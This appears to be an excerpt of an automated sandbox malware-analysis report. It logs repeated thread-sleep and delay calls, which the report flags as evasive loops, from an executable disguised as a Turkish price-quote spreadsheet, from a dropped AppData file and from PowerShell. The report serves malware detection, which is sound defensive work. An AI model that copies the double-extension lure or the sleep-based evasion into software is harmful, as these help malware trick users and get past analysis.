Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Window / User API: threadDelayed 6395 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Window / User API: threadDelayed 3586
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Window / User API: threadDelayed 6252
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep count: 6211 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep count: 92 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -28592453314249787s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8136 Thread sleep count: 3461 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8136 Thread sleep count: 6395 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599764s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599654s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598341s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598233s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597577s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597248s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -597030s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596374s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -596046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595499s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595280s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595171s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -595062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -594843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -594734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 8132 Thread sleep time: -594624s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 8068 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 2868 Thread sleep count: 3586 > 30
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 2868 Thread sleep count: 6252 > 30
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598188s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597516s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597294s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597185s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -597074s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596967s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596827s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596650s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596345s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595781s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595662s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595547s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595437s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595216s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -595109s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594997s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594890s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594781s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594671s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594562s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594452s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594344s >= -30000s
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896 Thread sleep time: -594234s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598341 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598233 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597577 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597248 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 597030 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596593 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596374 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 596046 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595499 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595280 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595171 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 595062 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Thread delayed: delay time: 594624 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598188
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597294
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597185
